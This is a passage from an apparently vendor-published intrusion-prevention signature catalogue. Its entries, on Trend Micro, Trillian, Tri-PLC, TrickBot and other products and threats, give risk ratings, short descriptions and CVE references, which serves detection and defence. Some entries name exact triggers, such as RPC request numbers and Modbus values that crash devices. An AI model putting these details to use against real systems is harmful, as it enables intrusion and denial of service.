Description:	Improper validation of user-supplied data to the license end point of Trend Micro SafeSync for Enterprise causes a command injection vulnerability which can be exploited to gain root-level code execution access on the target system.
Situation:	File-Text_Trend-Micro-Safesync-For-Enterprise-License-Command-Injection

Trend-Micro-Safesync-For-Enterprise-Replace_Local_Disk-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro SafeSync for Enterprise
Risk:	Moderate
First detected in:	sgpkg-ips-949-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro SafeSync for Enterprise
Type:	Input Validation
Description:	Improper validation of user-supplied data to the replace_local_disk() function of Trend Micro SafeSync for Enterprise causes a command injection vulnerability which can be exploited to gain root-level code execution access on the target system.
Situation:	File-Text_Trend-Micro-Safesync-For-Enterprise-Replace_Local_Disk-Command-Injection

Trend-Micro-Safesync-For-Enterprise-Restartservice-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro SafeSync for Enterprise
Risk:	Moderate
First detected in:	sgpkg-ips-864-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro SafeSync for Enterprise
Type:	Input Validation
Description:	Insufficient validation of request data in Trend Micro's SafeSync for Enterprise causes a command injection vulnerability. A successful exploitation allows an attacker to run arbitrary code with root privileges.
Situation:	HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Restartservice-Command-Injection

Trend-Micro-Safesync-For-Enterprise-Rollback-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro SafeSync for Enterprise
Risk:	Moderate
First detected in:	sgpkg-ips-880-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro SafeSync for Enterprise
Type:	Input Validation
Description:	Insufficient validation of request parameters in the rollback function of Trend Micro SafeSync for Enterprise causes a command injection vulnerability. A successful exploitation allows an attacker to run arbitrary code on the target system with root privileges.
Situation:	HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Rollback-Command-Injection

Trend-Micro-Safesync-For-Enterprise-Storage.pm-Device_Id-Role-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro SafeSync for Enterprise
Risk:	Moderate
First detected in:	sgpkg-ips-863-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro SafeSync for Enterprise
Type:	Input Validation
Description:	Insufficient validation of client input causes a command injection vulnerability in Trend Micro SafeSync for Enterprise. A successful exploitation allows an attacker to run arbitrary commands on the target system.
Situation:	HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Storage.pm-Device_Id-Role-Command-Injection

Trend-Micro-Scanmail-File-Disclosure

About this vulnerability:

File disclosure vulnerability in Trend Micro ScanMail for Domino

Risk:

Low

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro ScanMail

Type:

Insecure Configuration

Description:

Trend Micro ScanMail for Domino leaves certain files accessible through a Web browser. A remote attacker could use this vulnerability to obtain sensitive information and disable the anti-virus protection.

Situation:

HTTP_CSU-Trend-Micro-Scanmail-File-Disclosure

References:

CVE-2004-1003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1003

BID-11612
http://www.securityfocus.com/bid/11612

OSVDB-11510
http://www.osvdb.org/11510

Trend-Micro-ServerProtect-CreateBinding-DCE-RPC-Stack-Overflow

About this vulnerability:

Buffer overflow vulnerability in Trend Micro ServerProtect

Risk:

High

First detected in:

sgpkg-ips-108-2032

Last changed:

sgpkg-ips-1734-5242

Platform:

Windows

Software:

Trend Micro ServerProtect

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Trend Micro ServerProtect. A crafted RPC call with a malicious string allows arbitrary code execution with System level privileges.

Situation:

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-CreateBinding-DCE-RPC-Stack-Overflow

References:

CVE-2007-2508
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2508

BID-23868
http://www.securityfocus.com/bid/23868

OSVDB-35790
http://www.osvdb.org/35790

OSVDB-35789
http://www.osvdb.org/35789

Trend-Micro-ServerProtect-EarthAgent-DCE-RPC-Stack-Overflow

About this vulnerability:

Buffer overflow vulnerability in the EarthAgent component of Trend Micro ServerProtect

Risk:

High

First detected in:

sgpkg-ips-108-2032

Last changed:

sgpkg-ips-1734-5242

Platform:

Windows

Software:

Trend Micro ServerProtect

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in the EarthAgent component of Trend Micro ServerProtect. A crafted RPC call with a malicious string allows arbitrary code execution with System level privileges.

Situation:

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-EarthAgent-DCE-RPC-Stack-Overflow

References:

CVE-2007-2508
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2508

BID-23866
http://www.securityfocus.com/bid/23866

OSVDB-35790
http://www.osvdb.org/35790

OSVDB-35789
http://www.osvdb.org/35789

Trend-Micro-ServerProtect-EarthAgent-RPC-RPCFN-CopyAUSrc-BOF

About this vulnerability:

Buffer overflow vulnerability in Trend Micro ServerProtect

Risk:

High

First detected in:

sgpkg-ips-119-2032

Last changed:

sgpkg-ips-1734-5242

Platform:

Windows

Software:

Trend Micro ServerProtect

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Trend Micro ServerProtect. A crafted RPC call with opnum 0, Trent_req_num 0x001F0042, and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.

Situation:

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-EarthAgent-RPC-RPCFN-CopyAUSrc-BOF

References:

CVE-2007-4218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4218

BID-25395
http://www.securityfocus.com/bid/25395

Trend-Micro-ServerProtect-EarthAgent-String-Buffer-Overflow

About this vulnerability:

String handling buffer overflow vulnerability in Trend Micro ServerProtect

Risk:

High

First detected in:

sgpkg-ips-122-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Trend Micro ServerProtect

Type:

Buffer Overflow

Description:

Trend Micro ServerProtect suffers from a buffer overflow in string handling. A long string sent as a part of a certain command will cause a stack based buffer overflow. The vulnerability can be exploited by remote attackers to execute arbitrary code on a vulnerable host with System level privileges.

Situation:

Generic_Trend-Micro-ServerProtect-EarthAgent-String-Buffer-Overflow

References:

CVE-2007-4731
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4731

OSVDB-45878
http://www.osvdb.org/45878

Trend-Micro-ServerProtect-RPC-NTF-SetPagerNotifyConfig-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Trend Micro ServerProtect

Risk:

High

First detected in:

sgpkg-ips-118-2032

Last changed:

sgpkg-ips-1734-5242

Platform:

Windows

Software:

Trend Micro ServerProtect

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Trend Micro ServerProtect. A crafted RPC call with opnum 0, Trent_req_num 0x00030508 and a malicious payload allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.

Situation:

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-NTF-SetPagerNotifyConfig-Buffer-Overflow

References:

CVE-2007-4218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4218

BID-25395
http://www.securityfocus.com/bid/25395

Trend-Micro-ServerProtect-RPC-RPCFN-CMON-SetSvcImpersonateUser-BOF

About this vulnerability:

Stack-based buffer overflow vulnerability in Trend Micro ServerProtect

Risk:

High

First detected in:

sgpkg-ips-119-2032

Last changed:

sgpkg-ips-1734-5242

Platform:

Windows

Software:

Trend Micro ServerProtect

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Trend Micro ServerProtect. A crafted RPC call with opnum 0, Trent_req_num 0x000A0010, and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.

Situation:

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-RPCFN-CMON-SetSvcImpersonateUser-BOF

References:

CVE-2007-4218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4218

BID-25395
http://www.securityfocus.com/bid/25395

Trend-Micro-ServerProtect-RPCFN-Engine-RPC-Buffer-Overflows

About this vulnerability:

Buffer overflow vulnerabilities in Trend Micro ServerProtect

Risk:

High

First detected in:

sgpkg-ips-119-2032

Last changed:

sgpkg-ips-1734-5242

Platform:

Windows

Software:

Trend Micro ServerProtect

Type:

Buffer Overflow

Description:

There are stack-based buffer overflow vulnerabilities in Trend Micro ServerProtect. A crafted RPC call with opnum 0, Trent_req_num 0x000A0030, 0x00030010 or 0x0003000D, and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.

Situation:

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPCFN-Engine-RPC-Buffer-Overflows

References:

CVE-2007-4218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4218

BID-25395
http://www.securityfocus.com/bid/25395

Trend-Micro-ServerProtect-SPNT-Engine-RPC-Buffer-Overflows

About this vulnerability:

Buffer overflow vulnerabilities in Trend Micro ServerProtect

Risk:

High

First detected in:

sgpkg-ips-119-2032

Last changed:

sgpkg-ips-1734-5242

Platform:

Windows

Software:

Trend Micro ServerProtect

Type:

Buffer Overflow

Description:

There are stack-based buffer overflow vulnerabilities in Trend Micro ServerProtect. A crafted RPC call with opnum 0, Trent_req_num 0x0003010C or 0x00030044, and a malicious payload allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.

Situation:

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-SPNT-Engine-RPC-Buffer-Overflows

References:

CVE-2007-4218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4218

BID-25395
http://www.securityfocus.com/bid/25395

Trend-Micro-Smart-Protection-Server-Admin_notification.php-Command-Injection

About this vulnerability:

A vulnerability in Trend Micro Smart Protection Server

Risk:

High

First detected in:

sgpkg-ips-824-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Smart Protection Server

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in Tren Micro Smart Protection Server. This can allow a remote, authenticated attacker to execute arbitrary code on the affected system.

Situation:

HTTP_CRL-Trend-Micro-Smart-Protection-Server-Admin_notification.php-Command-Injection

References:

CVE-2016-6267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6267

Trend-Micro-Smart-Protection-Server-ccca_ajaxhandler.php-Remote-Code-Execution

About this vulnerability:

A vulnerability in Trend Micro Smart Protection Server

Risk:

High

First detected in:

sgpkg-ips-809-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Smart Protection Server

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in Trend Micro Smart Protection Server.

Situation:

HTTP_CRL-Trend-Micro-Smart-Protection-Server-ccca_ajaxhandler.php-Remote-Code-Execution

References:

CVE-2016-6266
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6266

Trend-Micro-Smart-Protection-Server-Wcs_Bwlists_Handler-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro Smart Protection Server
Risk:	Moderate
First detected in:	sgpkg-ips-880-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro Smart Protection Server
Type:	Input Validation
Description:	Insufficient validation of request parameter causes a command injection vulnerability in Trend Micro Smart Protection Server. A successful exploitation allows an attacker to run arbitrary commands with the privileges of the server process.
Situation:	HTTP_CRL-Trend-Micro-Smart-Protection-Server-Wcs_Bwlists_Handler-Command-Injection

Trend-Micro-Threat-Discovery-Appliance-Remote-Command-Execution

About this vulnerability:

A Trend Micro Threat Discovery Appliance Remote Command Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-1020-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Threat Discovery Appliance

Type:

Input Validation

Description:

A vulnerability in Trend Micro Threat Discovery Appliance, version 2.6.1062r1, which allows remote attackers to reset the admin password back to 'admin' and execute remote code on the target system.

Situation:

HTTP_CSH-Trend-Micro-Threat-Discovery-Appliance-Remote-Command-Execution

References:

CVE-2016-7552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7552

Trend-Micro-Web-Security-Virtual-Appliance-RCE

About this vulnerability:

An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance

Risk:

High

First detected in:

sgpkg-ips-1341-5242

Last changed:

sgpkg-ips-1341-5242

Platform:

Generic

Software:

Trend Micro InterScan Web Security Virtual Appliance

Type:

Input Validation

Description:

There exists a vulberability in Trend Micro InterScan Web Security Virtual Appliance, versions before 6.5 SP2 Patch 4 (Build 1901), which allows remote attackers to gather sensative information via directory traversal due to the insufficient validation of user input to the file parameter.

Situation:

HTTP_CS-Trend-Micro-Web-Security-Virtual-Appliance-RCE

References:

CVE-2020-8604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8604

Trendmicro-OfficeScanNT-Listener-Directory-Traversal

About this vulnerability:

A Trendmicro OfficeScanNT Listener Directory Traversal vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-796-5211

Last changed:

sgpkg-ips-1638-5242

Platform:

Generic

Software:

Trend Micro OfficeScan

Type:

Directory Traversal

Description:

A vulnerability in TrendMicro OfficeScanNT, multiple versions, which allows remote attackers to read arbitrary files via a directory traversal in an HTTP request.

References:

CVE-2008-2439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2439

BID-31531
http://www.securityfocus.com/bid/31531

OSVDB-48730
http://www.osvdb.org/48730

TRENDnet-SecurView-Buffer-Overflow

About this vulnerability:

A TRENDnet SecurView Buffer Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-709-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TRENDnet SecurView

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in TRENDnet SecurView Wireless Internet Camera, which allows remote attackers to execute arbitrary code via a long string to the OpenFileDlg method.

Situation:

File-Text_TRENDnet-SecurView-Buffer-Overflow

References:

CVE-2012-4876
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4876

BID-52760
http://www.securityfocus.com/bid/52760

OSVDB-80661
http://www.osvdb.org/80661

Tri-PLC-Crafted-Packet-Denial-Of-Service

About this vulnerability:

A vulnerability in Tri-PLC Nano-10 r81 allowing denial of service.

Risk:

High

First detected in:

sgpkg-ips-619-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Nano-10

Software:

Nano-10 PLC

Type:

Malfunction

Description:

A vulnerability exists in Tri-PLC Nano-10 r81 allowing an attacker to cause a denial of service condition by sending a modbus protocol quantity of coils set to 0x0000.

Situation:

Generic_CS-Tri-PLC-Crafted-Packet-Denial-Of-Service
Modbus_Read-Coils-Quantity-Of-Coils-Zero

References:

CVE-2013-2784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2784

Tri-PLC-Nano-10-r81-Denial-Of-Service

About this vulnerability:

A vulnerability in Tri-PLC Nano-10 r81 allowing denial of service.

Risk:

High

First detected in:

sgpkg-ips-618-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Nano-10

Software:

Nano-10 PLC

Type:

Malfunction

Description:

A vulnerability exists in Tri-PLC Nano-10 r81 allowing an attacker to cause a denial of service condition by sending a modbus protocol data size bigger than 0x200, causing the device to go into interrupt state.

Situation:

Generic_CS-Tri-PLC-Nano-10-r81-Denial-Of-Service

References:

CVE-2013-5741
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5741

OSVDB-97728
http://www.osvdb.org/97728

TrickBot-C2-Traffic

About this vulnerability:	Trickbot C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1202-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux; Windows
Software:	<os>
Type:	Backdoor
Description:	Trickbot is a banking trojan capable to perform many different tasks such as stealing banking credentials in the infected systems. TLS decryption is required to match all Trickbot traffic successfully.
Situation:	DNS-UDP_TrickBot-AnchorDNS-Client-Tunnel-Message DNS-UDP_TrickBot-AnchorDNS-Server-Tunnel-Message HTTP_CSU-TrickBot-C2-Traffic ICMP_TrickBot-AnchorDNS-ICMP-Probe-Request ICMP_TrickBot-AnchorDNS-ICMP-Probe-Response

TrickBot-Trojan

About this vulnerability:	TrickBot Trojan
Risk:	High
First detected in:	sgpkg-ips-930-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Javascript Injection
Description:	TrickBot trojan spreads by malicious PDF attachments in email. The PDF contains a macro script which downloads and executes the TrickBot trojan.
Situation:	File-PDF_Suspected-TrickBot-Trojan-PDF

Trihedral-Vtscada-Wap-Directory-Traversal

About this vulnerability:

A vulnerability in Trihedral VTScada

Risk:

Moderate

First detected in:

sgpkg-ips-784-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trihedral VTScada

Type:

Directory Traversal

Description:

Insufficient validation of user-supplied paths in WAP requests results in a directory traversal vulnerability in Trihedral VTScada. A successful exploitation allows an attacker to gain access to arbitrary files on the target system.

Situation:

HTTP_CSU-Trihedral-Vtscada-Wap-Directory-Traversal

References:

CVE-2016-4532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4532

Trihedral-Vtscada-Wap-Filter-Bypass

About this vulnerability:

A vulnerability in Trihedral VTScada

Risk:

Moderate

First detected in:

sgpkg-ips-789-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trihedral VTScada

Type:

Input Validation

Description:

Incorrect validation of a WAP request causes a vulnerability that allows arbitrary files to be read when exploited successfully.

Situation:

HTTP_CSU-Trihedral-Vtscada-Wap-Filter-Bypass

References:

CVE-2016-4510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4510

Trihedral-Vtscada-Web-Interface-Integer-Overflow

About this vulnerability:

A vulnerability in Trihedral VTS

Risk:

Moderate

First detected in:

sgpkg-ips-628-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trihedral VTScada

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been reported in Trihedral VTScada. The vulnerability is due to improper bounds checking while handling crafted requests to the HTTP server. By providing a crafted Content-Length header value, an attacker is able to terminate the HTTP server, creating a denial of service condition.

Situation:

HTTP_CS-Trihedral-Vtscada-Web-Interface-Integer-Overflow

References:

CVE-2014-9192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9192

OSVDB-115600
http://www.osvdb.org/115600

Trillian-Aim:-URI-Handler-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Trillian

Risk:

High

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Trillian

Type:

Buffer Overflow

Description:

Trillian has a buffer overflow vulnerability. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, to compromise the vulnerable system.

Situation:

HTTP_Trillian-Aim:-URI-Handler-Buffer-Overflow
File-Text_Trillian-Aim:-URI-Handler-Buffer-Overflow

References:

CVE-2007-3832
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3832

BID-24927
http://www.securityfocus.com/bid/24927

Trillian-Aim:-URI-Handler-Code-Injection

About this vulnerability:

Code injection vulnerability in Trillian

Risk:

High

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Trillian

Type:

Input Validation

Description:

There is a code injection vulnerability in Trillian. The vulnerability is a result of insufficient input validation while processing the ini parameter supplied via aim:// URIs . A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, to create arbitrary files on the affected system.

Situation:

HTTP_Trillian-Aim:-URI-Handler-Code-Injection
File-Text_Trillian-Aim:-URI-Handler-Code-Injection

References:

CVE-2007-3833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3833

BID-24927
http://www.securityfocus.com/bid/24927

Trimble-Navigation-SketchUp-BMP-File-Buffer-Overflow

About this vulnerability:

Trimble Navigation SketchUp BMP File Buffer Overflow detected

Risk:

Moderate

First detected in:

sgpkg-ips-571-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SketchUp

Type:

Buffer Overflow

Description:

A remote code execution vulnerability exists in Trimble Navigation's Sketchup. The vulnerability is due to a heap buffer overflow while processing BMP files which contain malicious RLE data. Remote unauthenticated attackers can exploit this vulnerability by enticing a target user to open a malicious BMP file. Successful exploitation could result in arbitrary code execution with the privileges of the logged in user. If exploitation is not successful, the application may terminate abnormally.

Situation:

File-Binary_Trimble-Navigation-SketchUp-BMP-File-Buffer-Overflow
File-Binary_Trimble-Navigation-SketchUp-Pict-File-Buffer-Overflow-2

References:

CVE-2013-3663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3663

BID-60248
http://www.securityfocus.com/bid/60248

Tripwire-File-Name-Format-String

About this vulnerability:	A vulnerability in Tripwire
Risk:	High
First detected in:	sgpkg-ips-419-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Unix
Software:	Tripwire; Open Source Tripwire
Type:	Format String
Description:	There is a format string vulnerability in Tripwire, a software tool that checks file system changes on a target system. Tripwire scans file systems for changes and can be configured to send an email report with the scan details (e.g., with the -M option). Upon encountering a file with a specially crafted name during such a scan, the format string vulnerability is triggered. It is possible for an attacker to run arbitrary code in the privilege of root, which is the default user account that runs Tripwire.
Situation:	FTP_CS-Tripwire-File-Name-Format-String

Trixbox-Directory-Traversal

About this vulnerability:

A Trixbox Directory Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-726-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trixbox

Type:

Directory Traversal

Description:

A vulnerability in Trixbox, versions CE 2.6.1 and before, which allows remote attackers to include and execute arbitrary file via a directory traversal.

Situation:

HTTP_CRL-Trixbox-Directory-Traversal

References:

CVE-2008-6825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6825

BID-30135
http://www.securityfocus.com/bid/30135

OSVDB-50421
http://www.osvdb.org/50421

Trojan-Downloader-MSIL-OnyxDropper-A

About this vulnerability:	Trojan Downloader MSIL OnyxDropper A
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Trojan Downloader MSIL OnyxDropper A traffic.
Situation:	HTTP_CRL-Trojan-Downloader-MSIL-OnyxDropper-A

Trojan-MSIL-Fergstox-A

About this vulnerability:	Trojan MSIL Fergstox A
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Trojan MSIL Fergstox A traffic.
Situation:	SMTP_CS-Trojan-MSIL-Fergstox-A

Trojan-Shell-Retemuja-A

About this vulnerability:	Trojan Shell Retemuja A
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Linux
Software:	<os>
Type:	Code Injection
Description:	Trojan Shell Retemuja A traffic.
Situation:	HTTP_CRL-Trojan-Shell-Retemuja-A

Trojan-Win32-FraudPack

About this vulnerability:	Trojan.Win32.FraudPack
Risk:	High
First detected in:	sgpkg-ips-293-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Trojan.Win32.FraudPack is a rogue antispyware application that claims to detect malware, but is actually malware by itself.
Situation:	HTTP_CS-Trojan.Win32.FraudPack-Checkin

TrueOnline-Billion-5200W-T-Router-Command-Injection

About this vulnerability:	A TrueOnline Billion 5200W-T Router Command Injection vulnerability
Risk:	High
First detected in:	sgpkg-ips-1028-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Billion 5200W-T
Type:	Input Validation
Description:	A vulnerability in the TrueOnline Billion 5200W-T routers, which allows remote attackers to execute arbitrary commands via the adv_remotelog.asp and tools_time.asp pages.
Situation:	HTTP_CRL-TrueOnline-Billion-5200W-T-Router-Command-Injection

TrueOnline-ZyXEL-P660HN-T-V1-Router-ViewLog.asp-Command-Injection

About this vulnerability:

A TrueOnline ZyXEL P660HN-T V1 Router ViewLog.aspCommand Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-1028-5242

Last changed:

sgpkg-ips-1622-5242

Platform:

Generic

Software:

ZyXEL P660HN

Type:

Input Validation

Description:

A vulnerability in the TrueOnline ZyXEL P660HN-T modems, version 1, which allows remote attackers to execute arbitrary commands via the ViewLog.asp page.

Situation:

HTTP_CRL-TrueOnline-ZyXEL-P660HN-T-V1-Router-ViewLog.asp-Command-Injection

References:

CVE-2017-18368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18368

TrueOnline-ZyXEL-P660HN-T-V2-Router-logSet.asp-Command-Injection

About this vulnerability:	A TrueOnline ZyXEL P660HN-T V2 Router logSet.asp Command Injection vulnerability
Risk:	High
First detected in:	sgpkg-ips-1028-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ZyXEL P660HN
Type:	Input Validation
Description:	A vulnerability in the TrueOnline ZyXEL P660HN-T routers, version 2, which allows remote attackers to execute arbitrary commands via the logSet.asp page.
Situation:	HTTP_CRL-TrueOnline-ZyXEL-P660HN-T-V2-Router-logSet.asp-Command-Injection

Trustwave-Holdings-Modsecurity-Chunked-Transfer-Encoding-Policy-Bypass

About this vulnerability:

A vulnerability in Trustwave: SpiderLabs ModSecurity

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ModSecurity

Type:

Input Validation

Description:

There exists a policy bypass vulnerability in ModSecurity.

Situation:

File-Text_Trustwave-Holdings-Modsecurity-Chunked-Transfer-Encoding-Policy-Bypass

References:

CVE-2013-5705
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5705

BID-66552
http://www.securityfocus.com/bid/66552

OSVDB-105191
http://www.osvdb.org/105191

Tstisapi-DLL-BOF

About this vulnerability:

Buffer overflow in tstisapi.dll on Pi3Web 1.0.1 Web server

Risk:

Moderate

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Windows

Software:

John Roy Pi3Web

Type:

Buffer Overflow

Description:

The tstisapi.dll on Pi3Web 1.0.1 Web server has a buffer overflow vulnerability. This allows remote attackers to cause a denial of service, and possibly execute arbitrary commands by using a long URL.

Situation:

HTTP_CSU-Tstisapi-DLL-BOF

References:

CVE-2001-0302
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0302

BID-2381
http://www.securityfocus.com/bid/2381

Tsunami-Linux-Trojan-Infection-Traffic

About this vulnerability:	Tsunami Linux trojan infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Linux
Software:	<os>
Type:	Backdoor
Description:	Tsunami Linux trojan infection traffic was detected.
Situation:	Generic_CS-Tsunami-Linux-Trojan-Infection-Traffic

Ttawebtop-Cgi-File-Disclosure

About this vulnerability:

ttawebtop.cgi arbitrary file disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

HP-UX; AIX; Linux; SCO; Solaris

Software:

Tarantella Enterprise

Type:

Directory Traversal

Description:

Tarantella Enterprise 3 has the ttawebtop.cgi script that does not sufficiently validate input. This makes it possible to remotely traverse the directory structure, and to view files readable by the Web server process.

References:

CVE-2001-0805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0805

BID-2890
http://www.securityfocus.com/bid/2890

Tumbleweed-SecureTransport-FileTransfer-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Tumbleweed SecureTransport

Risk:

High

First detected in:

sgpkg-ips-201-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Tumbleweed SecureTransport

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Tumbleweed SecureTransport ActiveX control. The control does not properly validate the size of the input data. This may allow arbitrary code to be injected and executed in the security context of the currently logged on user.

Situation:

HTTP_SS-Tumbleweed-SecureTransport-FileTransfer-ActiveX-Control-Buffer-Overflow
File-Text_Tumbleweed-SecureTransport-FileTransfer-ActiveX-Control-BOF

References:

CVE-2008-1724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1724

BID-28662
http://www.securityfocus.com/bid/28662

Turbosoft-Turboftp-Server-Port-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in TurboSoft TurboFTP

Risk:

High

First detected in:

sgpkg-ips-499-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

TurboFTP

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in TurboSoft TurboFTP Server. The vulnerability is due to a buffer overflow when handling PORT commands. A remote attacker can exploit this vulnerability by sending a specially crafted PORT command to the target server. Successful exploitation may allow the attacker to execute arbitrary code on the target user's machine with the privileges of the TurboFTP Server process.

Situation:

FTP_CS-Turbosoft-Turboftp-Server-Port-Command-Buffer-Overflow

References:

OSVDB-85887
http://www.osvdb.org/85887

TurboVNC-Fence-Message-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in TurboVNC

Risk:

High

First detected in:

sgpkg-ips-1203-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

TurboVNC

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in TurboVNC, versions prior to 2.2.3, which allows remote attackers to execute arbitrary code through the Fence message, due to unsufficient input validation.

Situation:

